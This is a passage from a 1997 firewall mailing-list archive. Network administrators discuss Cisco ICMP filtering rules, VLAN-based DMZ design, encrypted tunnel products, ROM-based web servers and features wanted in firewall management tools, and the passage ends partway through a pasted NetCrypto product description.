^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Darwin L. Martinez Voice: 404-843-5954 Network Systems Engineer Pager: 888-346-1320 International Network Services Vmail: 770-641-4004 Atlanta Office Email: http://www.ins.com "In the mornin' you go gunnin', for the man who stole your water." ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ From firewalls-owner Fri Jan 10 12:41:04 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA00457 for firewalls-outgoing; Fri, 10 Jan 1997 11:08:08 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id LAA00352 for firewalls@greatcircle.com; Fri, 10 Jan 1997 11:07:31 -0800 (PST) Received: from Walden.MO.NET (walden.mo.net [199.250.196.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA20009 for ; Thu, 9 Jan 1997 08:11:20 -0800 (PST) Received: from gate.hussmann.com (gate.hussmann.com [205.139.246.2]) by Walden.MO.NET (8.8.3/8.6.10) with ESMTP id KAA06735 for ; Thu, 9 Jan 1997 10:19:07 -0600 (CST) Received: (from nobody@localhost) by gate.hussmann.com (8.7.1/8.7.3) id KAA14613 for ; Thu, 9 Jan 1997 10:10:23 -0600 Message-Id: <199701091610.KAA14613@gate.hussmann.com> Received: from mail-gate.hussmann.com(129.1.5.4) by gate.hussmann.com via smap (V1.3) id tmp014611; Thu Jan 9 10:10:14 1997 Date: Thu, 9 Jan 1997 10:10:00 -0600 From: "Hicks, Rick" Subject: RE: internal filtering router - filter c To: "'Firewalls List'" X-Mailer: Worldtalk (NetConnex V4.00a)/MIME Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: Darren Cromer >Subject: RE: internal filtering router - filter config? > >Why ICMP? Im curious what inherent risk that would present. ICMP redirect packets *could* modify you're routing table and leave your router/hosts essentially dead. >I too am setting up a screening firewall, but I want to allow pings to >traverse the external router. (any advice on how to filter all ICMP >except >pings?) Here is how I allow ping and traceroute through a Cisco router: access-list 101 permit icmp any xxx.xxx.xxx.x 0.0.0.255 echo access-list 101 permit icmp any xxx.xxx.xxx.x 0.0.0.255 echo-reply access-list 101 permit icmp any xxx.xxx.xxx.x 0.0.0.255 unreachable access-list 101 permit icmp any xxx.xxx.xxx.x 0.0.0.255 time-exceeded Also, here is the command to block redirects directed to the router; apply it to each interface: no ip redirects Rick ________________________________________________ Rick Hicks Systems Specialist Hussmann Corporation rhicks@hussmann.com http://www.hussmann.com From firewalls-owner Fri Jan 10 13:03:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA05042 for firewalls-outgoing; Fri, 10 Jan 1997 12:11:02 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA04990 for ; Fri, 10 Jan 1997 12:10:35 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id MAA05315; Fri, 10 Jan 1997 12:09:21 -0800 Received: from gate.ups.com(198.80.14.2) by mycroft via smap (V1.3mjr) id sma005313; Fri Jan 10 12:09:03 1997 Received: by gate.ups.com id AA05474 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Fri, 10 Jan 1997 15:08:29 -0500 Received: by gate.ups.com (Protected-side Proxy Mail Agent-2); Fri, 10 Jan 1997 15:08:29 -0500 Received: by gate.ups.com (Protected-side Proxy Mail Agent-1); Fri, 10 Jan 1997 15:08:29 -0500 Date: Fri, 10 Jan 1997 15:08:25 -0500 (EST) From: Dave Wreski X-Sender: tel1dvw@butthead To: firewalls@GreatCircle.COM Subject: Restricting port access Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I understand it is important to explicitly define which ports are acceptable in a firewall, but I don't understand why. If I have source and destination IP's defined, does it really make that much difference? Thanks, Dave Wreski ----------------------------------------------------------------------- "The opinions expressed here are my own and do not represent the views or opinions of United Parcel Service, Inc." ----------------------------------------------------------------------- echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sb20293A2058554E494Csnlbxq'|dc From firewalls-owner Fri Jan 10 13:09:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA02358 for firewalls-outgoing; Fri, 10 Jan 1997 11:31:27 -0800 (PST) Received: from mule1.mindspring.com (mule1.mindspring.com [204.180.128.167]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA02334 for ; Fri, 10 Jan 1997 11:31:13 -0800 (PST) Received: from MENTOR.dssny.com ([38.216.37.12]) by mule1.mindspring.com (8.8.4/8.8.4) with SMTP id OAA20568 for ; Fri, 10 Jan 1997 14:30:25 -0500 Message-Id: <3.0.32.19970110143008.006fceec@pop.pipeline.com> X-Sender: bbrent@pop.pipeline.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Fri, 10 Jan 1997 14:30:19 -0500 To: Firewalls@GreatCircle.COM From: "William A.Brent" , bbrent@pipeline.com Subject: Outlink updates 'The Firewall Report Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk had this come across the wire today, thought it might be of interest (though just a bit pricey) *** Outlink updates 'The Firewall Report' Outlink, Inc., an information technology market research firm, has updated "The Firewall Report" publication. Outlink is now selling the report with profiles of Trusted Information System's Gauntlet 3.2, Secure Computing's Sidewinder 3.0, Secure Computing's BorderWare Firewall Server 4.0 and Milkyway Networks' Black Hole 3.0 version. Outlink's research profiles 20 leading firewall solutions and suppliers. Priced at $995, "The Firewall Report" contains profiles of 20 leading products and their suppliers. Each profile is approximately 60 to 80 pages in length with detailed research. bb .,-*'`^`'*-,.__.,-*'`^`'*-,.__.,-*'`^`'*-,.__.,-*'`^`'*-,._ --==[> All spelling errors due to line noise <]==-- --==[> E-Mail me at bill@dssny.com <]==-- _.,-*'`^`'*-,.__.,-*'`^`'*-,.__.,-*'`^`'*-,.__.,-*'`^`'*-,._ From firewalls-owner Fri Jan 10 13:15:34 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA03701 for firewalls-outgoing; Fri, 10 Jan 1997 11:51:54 -0800 (PST) Received: from sonda.cl (mail.sonda.cl [200.6.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA03680 for ; Fri, 10 Jan 1997 11:51:43 -0800 (PST) Received: by guardia.sonda.cl id <24204>; Fri, 10 Jan 1997 16:54:30 -0300 Posted-Date: Fri, 10 Jan 1997 16:49:01 -0300 Date: Fri, 10 Jan 1997 10:50:23 -0300 Message-Id: <97Jan10.165430cdt.24204@guardia.sonda.cl> From: m_fliguer@sonda.cl (Miguel Fliguer - Troppus Erawtfos) To: firewalls@GreatCircle.COM Subject: Re: TCP/IP encrypted connection X-VMS-To: SMTP%"firewalls@greatcircle.com" X-VMS-Cc: M_FLIGUER Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You wrote : >>>I'm looking for a good way to transfer TCP/IP data between two Networks >>>(two countries) safe and secure ower the Internet. Maybe a router which >>>is cabable of crypting outgoing packets addressed to certain networks? >>>Any ideas would be appreciated. >>>Thanks and best regards, a reply would be greatly appreciated. I'd suggest joining DEC's Altavista Visionary Club (it's free, and you can download all the betas and evaluation copies). It's at : http://204.123.2.99/cgi-bin/download.cgi You will find (among many other interesting betas) : ALtavista Tunnel (Personal Edition) (for W95 & WNT) Altavista Tunnel (Workgroup Edition) (for many architectures) Altavista Tunnel Guide (postscript) This stuff will let you encrypt TCP/IP packets and then encapsulate them to be transmitted. The software establishes a "tunnel" between a (for example) PC on the Internet, and a server on an Intranet, using "pseudoadapters" within a restricted IP address range. Get the guide and print it, you will get the complete picture. Regards, Miguel Fliguer SONDA Computacion Buenos Aires, Argentina From firewalls-owner Fri Jan 10 13:44:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA03470 for firewalls-outgoing; Fri, 10 Jan 1997 11:49:20 -0800 (PST) Received: from csc.com (explorer.csc.com [20.1.10.27]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA03463 for ; Fri, 10 Jan 1997 11:49:09 -0800 (PST) Received: from sdfpc2.gsfc.nasa.gov by csc.com with smtp (Smail3.1.29.1 #1) id m0vimwA-001ArAC; Fri, 10 Jan 97 14:48 EST Message-ID: <32D6C593.554C@csc.com> Date: Fri, 10 Jan 1997 14:41:23 -0800 From: Adam Safier Reply-To: asafier@csc.com Organization: Computer Sciences Corp. X-Mailer: Mozilla 3.0 (Win16; U) MIME-Version: 1.0 To: palan@dataprep.com.my, Firewalls@GreatCircle.COM Subject: VLAN OVER FW-1 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > ... can checkpoint fw-1 have a full > control over a certain VLANs ? I doubt it. What do you mean by "full control"? It won't configure the VLAN or filter by MAC address. It has control of IP packets sent to the firewall interace. No firewall controls traffic that is not passing through it. (You could theoretically cause interferance on the subnet but no one I know does it.) > 10mb +------+ 155mb > INTERNET ---------| SUN |-----------INTERNAL NETWORK > | FW-1 | > +---+--+ > | > | > | 10mb > | > | > VLAN > > the machines that grouped in these particular VLAN is scattered around the > building. i need some advice on how effective is this setup and does anyone > implemented such a design ? This is a common Firewall-1 configuration. The DMZ is a separate IP subnet. If you are using a VLAN to separate your IP subnets you run the risk that the system admin might accidentally reconfigure the VLAN to allow the DMZ nodes to be visible from the other net. The diagram you have is a logical diagram while I assume your actual physical diagram would have a line running from the VLAN to the Internal network (forming a physical triangle to a backbone of VLAN's). Since they are separate IP subnets the systems might not talk to each other directly if the VLAN is reconfigured or bridged to other VLAN's. But anyone who bothered checking ARP tables, ran a sniffer or simply misconfigured his machine to a much bigger mask or wrong IP subnet could see your DMZ systems. So - weigh how well do your trust the VLAN configuration system, VLAN logic and your VLAN admin vs. the cost of running a separate physical LAN for the sensetive nodes vs. relocating the sensetive machines into one secure computer room (They are physically secure, right?) If you must use the VLAN you might also consider running the DMZ interface as 802.3 while the Internal LAN is DIX ethernet (or visa versa.) I havn't tried this (yet) but it should add an additional layer of protection in case the VLAN is misconfigured. The Sniffer would have to be listening to both DIX and 802.3 and looking outside the correct local IP subnet. I've gotten warnings about the combination of 802.3 and NAT not working well in FW-1 2.1 so watch out for that combo (NAT's fine with DIX ethernet). I'm not sure if it's supposed to be fixed in 3.0, which I'm looking forward to. Good luck, Adam -- Adam Safier asafier@csc.com http://www.csc.com CSC-SED-Infosec (301) 794-1349 (301) 552-3272 (fax) Technology Abuse: 1) Netscape Frames on a 14" screen. 2) Netscape 3.0 on a 386-33 w/ 8 Meg RAM. The above are my own opinions. I'm proud to live in a country where I'm free to express them! From firewalls-owner Fri Jan 10 13:51:49 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA06839 for firewalls-outgoing; Fri, 10 Jan 1997 12:34:42 -0800 (PST) Received: from grtk (grtk.com [204.227.12.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06781 for ; Fri, 10 Jan 1997 12:34:20 -0800 (PST) Received: from Fortress.grtk.com ([150.1.10.54]) by grtk (8.6.9/8.6.9) with SMTP id PAA10589 for ; Fri, 10 Jan 1997 15:47:32 -0500 Message-Id: <1.5.4.32.19970110203635.006a5348@grtk.com> X-Sender: jcross@grtk.com X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 10 Jan 1997 15:36:35 -0500 To: firewalls@GreatCircle.COM From: John Cross Subject: Newbie Q's & Class 3 Firewalls? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm currently trying to find a replacement for our TIS firewall running on a BSD box. I've asked for product info on the following: Guardian OnGuard CheckPoint Eagle NT I'm planning on running the system on an NT pentium box. Couple of questions: 1. I've had a couple of those sales types banter around the term 'Class 3' firewall, what are they talking about? I think Class 1 is just packet filtering, Class 2 is proxy service, but don't quite understand Class 3. 2. I'm looking for transparency for my uneducated users. They are having a hard enough time understanding ftp, much less having to hit a firewall and then bounce off of there to the site their trying to reach. Does anyone have suggestions/comments on any products for this? (okay, I confess, I also want to be able to play Diablo, IRC, etc through the firewall and TIS isn't letting me) 3. Does the webserver belong in the DMZ? I've noticed in a lot of the reading that the webserver is usually stuck outside the firewall, why is this? Is the sacrificial lamb or does it just pose too many problems bringing it on the inside? Any tips for securing it if its stuck out in the DMZ? Most importantly, can the Webserver run on the same box as the firewall or is this a bad idea? ========================================================================== System Administration | POWER Rambling Wreck from GA.TECH | maMtItNeDr Pi Kappa Phi, Iota 1095 | Look to the future, its all we have left ========================================================================== From firewalls-owner Fri Jan 10 15:30:01 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA12596 for firewalls-outgoing; Fri, 10 Jan 1997 13:19:37 -0800 (PST) Received: from challenger.atc.fhda.edu (challenger.atc.fhda.edu [153.18.32.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA12518 for ; Fri, 10 Jan 1997 13:19:09 -0800 (PST) Received: from localhost (manek@localhost) by challenger.atc.fhda.edu (8.8.0/8.7.3) with SMTP id NAA29747; Fri, 10 Jan 1997 13:18:33 -0800 (PST) Date: Fri, 10 Jan 1997 13:18:32 -0800 (PST) From: Sameer R Manek To: Alexey Zilber cc: firewalls@GreatCircle.COM Subject: Re: Rom based os/web server? In-Reply-To: <2.2.32.19970109161037.00bf5620@icarus.usanetworks.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk True a rom based os is a nice thing, but can you ever change configuration files? upgrade the kernel? or what about security patches? All these will require new card or rom upgrade from the vender unless they give you some way to do it, possibly a flash rom in which case someone could hack the box and possibly remotely burn a backdoor. IMHO a better way to do things is have the webserver nfs mount the files from another box, which exports them read only. Then have the nfs server locked down, even they penitrate your web server the files are intact, which means one less thing you have to do for damage control. Sameer -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Sameer Manek manek@challenger.atc.fhda.edu "A mind once streched by a new idea never regains its original dimentions" -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- On Thu, 9 Jan 1997, Alexey Zilber wrote: > I recieved the previous months copy of The Linux Journal (yes, yes, I know.. > :-) ). And it talks about a rom based stripped down version of Linux that's > been created, for systems that cannot use components that could be damaged > from stress (like hardrives). This thing is stored, compressed in rom, then > gets booted and uncompressed into ram. > This thing might be good for a hard-coded webserver. While it could > get hacked, a reboot and a password change should be all that's needed to > repair it. > Alex > > From firewalls-owner Fri Jan 10 15:33:08 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA19946 for firewalls-outgoing; Fri, 10 Jan 1997 14:03:48 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA19764 for ; Fri, 10 Jan 1997 14:03:11 -0800 (PST) From: Patrick_Scannell@mail.fws.gov Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA06177; Fri, 10 Jan 1997 14:01:52 -0800 Received: from dns.irm.r9.fws.gov(164.159.176.1) by mycroft via smap (V1.3mjr) id sma006124; Fri Jan 10 14:00:43 1997 Received: from mail.fws.gov by dns (SMI-8.6/SMI-4.1) id PAA24020; Fri, 10 Jan 1997 15:05:48 -0700 Received: from ccMail by mail.fws.gov (SMTPLINK V2.11 PreRelease 4) id AA852937371; Fri, 10 Jan 97 12:54:59 MST Date: Fri, 10 Jan 97 12:54:59 MST Message-Id: <9700108529.AA852937371@mail.fws.gov> To: firewalls@GreatCircle.COM Subject: cc:Mail through a FireWall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please share your experience routing cc:Mail through a firewall. For instance, what port does it use? Thanks, Patrick From firewalls-owner Fri Jan 10 15:35:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA13179 for firewalls-outgoing; Fri, 10 Jan 1997 13:25:01 -0800 (PST) Received: from shell.flinet.com (shell.flinet.com [205.216.85.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA13127 for ; Fri, 10 Jan 1997 13:24:45 -0800 (PST) Received: (from scott@localhost) by shell.flinet.com (8.8.4/8.8.3) id QAA05132; Fri, 10 Jan 1997 16:24:28 -0500 (EST) Date: Fri, 10 Jan 1997 16:24:27 -0500 (EST) From: Scott Averbach To: Alexey Zilber cc: firewalls@GreatCircle.COM Subject: Re: Rom based os/web server? In-Reply-To: <2.2.32.19970109161037.00bf5620@icarus.usanetworks.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well I see at least two things wrong with this.... 1) The same software that would code the "WEB SITE" into the ROM could be reproduced to code other stuff such as a backdoor.... 2) A machine like this would cost far more then it would to adequatly secure and backup a normail Linux machine... Whole Linux OS in rom seems like a lot....then put it into RAM.... thats a large amout of cash... put it on its on segment with a firewall and secure it and you have a versatile machine for a lot less money! ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\--- -/- Scott Averbach -\- Florida Internet Corporation -/- -\- Senior Systems Administrator -/- We are - Voice: 561.615.0001 -\- -/- mail:scott@flinet.com -\- the most - Fax: 561.615.0002 -/- -\- http://www.flinet.com -/- highly rated ISP in Florida! -\- ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\--- ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\--- -/- The truth is out there -\- C Code, C Code Run, Run -/- -\- anyone know the URL? -/- Code, RUN! PLEASE!!! -\- ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\--- On Thu, 9 Jan 1997, Alexey Zilber wrote: > I recieved the previous months copy of The Linux Journal (yes, yes, I know.. > :-) ). And it talks about a rom based stripped down version of Linux that's > been created, for systems that cannot use components that could be damaged > from stress (like hardrives). This thing is stored, compressed in rom, then > gets booted and uncompressed into ram. > This thing might be good for a hard-coded webserver. While it could > get hacked, a reboot and a password change should be all that's needed to > repair it. > Alex > > > From firewalls-owner Fri Jan 10 15:40:21 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA21746 for firewalls-outgoing; Fri, 10 Jan 1997 14:10:57 -0800 (PST) Received: from usanetworks.com (icarus.usanetworks.com [204.178.38.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA21689 for ; Fri, 10 Jan 1997 14:10:36 -0800 (PST) Received: from koguma (alpha.usanetworks.com) by usanetworks.com (5.x/SMI-SVR4) id AA24306; Fri, 10 Jan 1997 17:13:16 -0500 Message-Id: <2.2.32.19970110220756.00aadd84@icarus.usanetworks.com> X-Sender: alex@icarus.usanetworks.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 10 Jan 1997 17:07:56 -0500 To: Scott Averbach From: Alexey Zilber Subject: Re: Rom based os/web server? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 04:24 PM 1/10/97 -0500, you wrote: >Well I see at least two things wrong with this.... > >1) The same software that would code the "WEB SITE" into the ROM could be >reproduced to code other stuff such as a backdoor.... > Not possible, the burner is external. This is the same way many routers are setup, with the firmware being in the ROM. To upgrade, you get new chips. >2) A machine like this would cost far more then it would to adequatly >secure and backup a normail Linux machine... Whole Linux OS in rom seems >like a lot....then put it into RAM.... thats a large amout of cash... >put it on its on segment with a firewall and secure it and you have a >versatile machine for a lot less money! Now I'm not so sure. A stripped down version of Linux with a webserver, would not take up that much. Anyway, such a setup would be great for a webserver in a rough environment. BUT, many IDE (and I'm sure scsi) have a Read Only jumper on the actual HD. Think of the many uses... > > > > ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\--- > -/- Scott Averbach -\- Florida Internet Corporation -/- > -\- Senior Systems Administrator -/- We are - Voice: 561.615.0001 -\- > -/- mail:scott@flinet.com -\- the most - Fax: 561.615.0002 -/- > -\- http://www.flinet.com -/- highly rated ISP in Florida! -\- > ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\--- > > ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\--- > -/- The truth is out there -\- C Code, C Code Run, Run -/- > -\- anyone know the URL? -/- Code, RUN! PLEASE!!! -\- > ---/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\--- > >On Thu, 9 Jan 1997, Alexey Zilber wrote: > >> I recieved the previous months copy of The Linux Journal (yes, yes, I know.. >> :-) ). And it talks about a rom based stripped down version of Linux that's >> been created, for systems that cannot use components that could be damaged >> from stress (like hardrives). This thing is stored, compressed in rom, then >> gets booted and uncompressed into ram. >> This thing might be good for a hard-coded webserver. While it could >> get hacked, a reboot and a password change should be all that's needed to >> repair it. >> Alex >> >> >> > Alex From firewalls-owner Fri Jan 10 15:42:14 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA24343 for firewalls-outgoing; Fri, 10 Jan 1997 14:24:11 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA24336 for ; Fri, 10 Jan 1997 14:24:03 -0800 (PST) Received: by hidata.com; id AA13076; Fri, 10 Jan 97 14:23:50 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma013074; Fri, 10 Jan 97 14:23:30 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFF01.BA80BD30@oscntsrv.hidata.com>; Fri, 10 Jan 1997 14:22:37 -0800 Message-Id: From: "Stout, Bill" To: "'Firewall List'" Subject: FW-Farm management Application Date: Fri, 10 Jan 1997 14:22:36 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I dropped out of the list for a few days, and expected to see some general discussion on the list about managing FW-farms. However the replies I received are only from v_large corporations and governmental agency users. Seems most companies and vendors are not ready to take on FW-farm management issues yet, though users are. This is an indication of a 'small but present' market segment. Firewall sales usually are very small quantities per company, and very few companies who have firewalls have farms, and just a of those farms have a current want for a FW-farm Management application. The list is too long, and for multi-platform management capability would require some SSL'd multivendor network API. The development would be expensive, but for some v_large_J companies with long-term vision, not too expensive if the technology developed were reusable. (I speak only for myself). Anyway here are a few additions to the list, and the original list: Additional suggestions: A. VPN Management capability B. Traffic Statistics per-proxy C. Multi-protocol management (Internal-internal) Original List: 1. An initial GUI which allows an administrator to view multiple gateways, ports, alert status, and proxy states. 2. The ability to select a proxy and view configuration information on that proxy on a specific gateway. 3. The ability to delegate departmental security. 4. The ability to manage individual user authentication per proxy. 5. The ability to centrally view logs. 6. The ability to send pages on specific events. 7. If located on the same DMZ subnet as the gateways, the ability to sniff packets and graphically organize them, other basic network management monitoring. 8. A sanity-check utility which looks for obvious proxy filter configuration errors. 9. A tripwire utility to display alerts on file and process state changes. 10. 'Courtney' for farms? 11. Instant traceback utility to collect suspicious host information (DNS data, traceroute, whois, traffic type, etc). 12. Time synchronization verification for accurate log comparisons. 13. Strongly encrypted and authenticated administrative channels. 14. Load balancing? Bill Stout Sr. Systems Admin Hitachi Data Systems From firewalls-owner Fri Jan 10 15:59:48 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA26778 for firewalls-outgoing; Fri, 10 Jan 1997 14:52:03 -0800 (PST) Received: from safety.worldcom.com (safety.worldcom.com [198.64.193.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA26761 for ; Fri, 10 Jan 1997 14:51:45 -0800 (PST) Received: (from smtp@localhost) by safety.worldcom.com (8.7.1/8.6.9) id QAA08802 for ; Fri, 10 Jan 1997 16:36:41 -0600 (CST) Received: from worldcom-47.worldcom.com(198.64.193.159) by safety.worldcom.com via smap (V1.3) id sma008792; Fri Jan 10 16:36:37 1997 Received: by worldcom-47.worldcom.com (IBM OS/2 SENDMAIL VERSION 1.3.14/3.3) id AA0336; Fri, 10 Jan 97 16:36:23 -0800 Message-Id: <9701110036.AA0336@worldcom-47.worldcom.com> Received: from WorldCom with "Lotus Notes Mail Gateway for SMTP" id E7FC618DEE6A9B968625641B007C1AC7; Fri, 10 Jan 97 16:36:22 To: firewalls From: Anthony Commarata Date: 10 Jan 97 16:53:51 EDT Subject: Re: TCP/IP encrypted connection Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I highly recommend NetCrypto; NetCrypto (McAfee) for Windows works with the existing TCP/IP stack ie: WRQ Reflections. This is accompliced by operating on the windows DLL level. Ensuring that each session between each workstation is encrypted, from the users perspective its transparent. NetCrypto has a few options for encryption level, DES, Triple-DES and PC1. However if used overseas you would have to use the 40 bit PC1 encryption to comply with the US government's US ITAR regulations which controls the export of encryption software. Complete Network Security and Privacy NetCrypto Protects Your Data from Prying Eyes Consider the information being sent over your network: confidential company data, electronic mail, proprietary output, not to mention your name and password every time you connect to a remote server. All of this information is sent over your network, or over the Internet, in plain clear text that can be easily intercepted, examined or modified by anyone else on the network. Not any more. With NetCrypto, all of your network sessions, including telnet, ftp, SQL, WWW, email and so on, are transparently encrypted with industry-standard strong encryption algorithms. Only you and the program you're interacting with on the remote server can see the decrypted information. Anyone else sees nothing but random gobbledygook. Transparent Protection NetCrypto transparently protects all TCP/IP network traffic as it travels between UNIX, Windows, and Macintosh computers. It intercepts data coming from an application, and applies strong encryption before permitting them onto your network. On the destination computer, NetCrypto transparently decrypts the communications before passing them up to the receiving application. Using an open-architecture security manager, NetCrypto employs a variety of security technologies to prevent snoopers from gathering user names, passwords, transaction information, and other sensitive data as they pass from one computer to another across your networks or the Internet. NetCrypto supports Windows, UNIX amd Macintosh systems with TCP/IP networking. Easy to Install, Maintain, and Use NetCrypto is easy to install, maintain, and use. On Windows and Macintosh systems, no application or system modifications are required eliminating two major impediments to implementing secure networking. No user training is required, since all encryption activities are transparent to the end user. Full compatibility with a non-NetCrypto machine is maintained, making NetCrypto roll-out a snap, even for large sites. Open Architecture to Support Standards To cope with the wide range of emerging encryption standards, NetCrypto provides and open-architecture encryption manager into which new software modules for encryption, authentication, and filtering can be plugged. McAfee is committed to working both independently and with other interested third parties to support emerging standards. NetCrypto Benefits By using NetCrypto, a company protects itself from the growing number of network-based attacks that result in downtime, leaked sensitive data, tampering, and other costly security breaches. Complementary security solutions such as firewalls and encrypting routers protect data from one site boundary to another, but NetCrypto provides true end-to-end protection. This makes NetCrypto particularly well suited not only to Internet remote access situations, but also to intranet applications within the enterprise. Ubiquitous Secure Computing NetCrypto provides straightforward, transparent, strong network security, with an open architecture that handles emerging security standards, and that maintains full compatibility with non NetCrypto equipped machines. NetCrypto is the first product to reflect both the growing need for integrated security and the need for an open architecture upon which to base it. NetCrypto provides the link between the existing world of unprotected networked communications and the new world of ubiquitous secure networking. Features and Benefits Encrypts All TCP/IP Traffic Encrypting all network traffic ensures that any communication you have over your network is private and secure from eavesdropping. Whether you're sending email, transferring files, or browsing the web, all information across the network remains confidential. Because the traffic is encrypted at a system level, separate packages are not required for different types of TCP communication. NetCrypto encrypts all TCP traffic, including telnet, rlogin, email, WWW, SQL, ftp, and so on. Software Solution No expensive hardware to purchase and install. The software is easily distributed across an entire network, making roll-out a snap. No System or Application Modifications Promotes compatibility with future operating system upgrades and modifications. This also helps to prevent any conflicts with existing software that may require an unmodified operating system. Since applications can be used without modifications in most cases, NetCrypto can be put to use immediately with your existing code. Negligible Network Overhead This means that NetCrypto will not slow your network down. Programs that use lots of network bandwidth can often slow your network down, especially on computers with slower processors. This does not happen with NetCrypto. System drop-in on Windows and Macintosh The Windows and Macintosh versions of NetCrypto are 'set-and-forget' systems that are transparent to the user. This means that users can continue to use whatever programs they have been using for email, telnet, ftp, etc( No training or relearning is required. Available on Many Systems Since NetCrypto operates on most UNIX platforms, Macintosh systems, and Windows 3.x, 95 and NT, you can be confident that all your systems will be protected. Requires No Key Management This greatly simplifies the administration of NetCrypto. No external key management server is required. Key management can be added in the future for authentication purposes, but it is not required. Small Binary File Makes for easy network - or disk based distribution. Multiple Encryption Algorithms Uses industry-standard encryption that meets most security requirements Supports DES, Triple DES, PC1 and 